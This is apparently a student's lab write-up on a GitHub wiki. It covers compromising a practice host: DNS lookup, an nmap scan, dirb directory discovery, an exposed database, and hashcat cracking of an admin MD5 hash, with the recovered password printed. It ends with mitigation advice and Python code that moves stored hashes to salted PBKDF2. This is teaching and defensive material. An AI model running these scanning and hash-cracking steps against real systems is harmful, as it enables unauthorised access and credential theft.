Exploiting Gloin - tmansfield42/Tech-Journal GitHub Wiki

● Target IP Address

nslookup [what you're looking up] [DNS server]

nslookup -vc gloin.shire.org 10.0.5.21

IP is 10.0.5.31

● Open Ports

nmap -sV -O -A 10.0.5.31

22, 443, 3389

● Discovered Vulnerability

dirb https://10.0.5.31

10.0.5.31/entrance_exam/db is an open database containing user information

● How you achieved a foothold

Downloaded the database, looked in the 1st table labeled admin_list, and copied the hashed password labeled password.

● How you achieved root/Administrative level compromise

echo "4214db3884e9cd913b49b5b44e49ae96" > hash.txt

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Password is Moria2Featon6

● User Flag

● Root Flag

● How might the vulnerabilities be mitigated by the systems administrator and developer?

This could definitely be mitigated by not having a database containing user info available to the open web. It was relatively easy to find (I just used the dirb command), and the user and password in the MySQL database were also shared across computer accounts.
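The hashcat command above uses -m 0, hashcat's raw MD5 mode, so the value copied from admin_list was a fast, unsalted digest. The following is an added example (not code from the target application or from this journal) of how a developer could flag such rows and migrate them to salted PBKDF2 at the next successful login. The table layout, function names, sample values and iteration count are assumptions.

```python
import hashlib
import hmac
import os
import re

PBKDF2_ITERATIONS = 600_000  # assumption: tune to your own hardware budget
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")  # bare 32-hex digest: no salt, no scheme tag


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$iterations$salt_hex$digest_hex' with a random per-user salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Check a password against either storage format, comparing in constant time."""
    if LEGACY_MD5.match(stored):
        candidate = hashlib.md5(password.encode()).hexdigest()
        return hmac.compare_digest(candidate, stored)
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def audit(rows):
    """Return usernames whose stored value is still a bare MD5-style digest."""
    return [user for user, stored in rows.items() if LEGACY_MD5.match(stored)]


def login_and_upgrade(rows, user, password):
    """Verify a login and, on success, rewrite a legacy digest in the salted format."""
    stored = rows.get(user)
    if stored is None or not verify_password(password, stored):
        return False
    if LEGACY_MD5.match(stored):
        rows[user] = hash_password(password)
    return True


# Constructed sample table (not data from the target): one legacy row, one migrated row.
SAMPLE = {
    "legacy_admin": hashlib.md5(b"constructed-pass-1").hexdigest(),
    "migrated_user": hash_password("constructed-pass-2"),
}
```

Salting and a slow KDF only raise the cost of offline guessing. The database file still has to be moved out of the web root, and the password must not be reused for the OS account.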

What gave you trouble with this Target? What did you need assistance with? Provide a link to your journal page.

A bunch of things gave me trouble. I tried doing SQL injection but couldn't get to the Admin account, nor could I get into the actual computer itself. I eventually rediscovered the available database file, and that led me down the right path.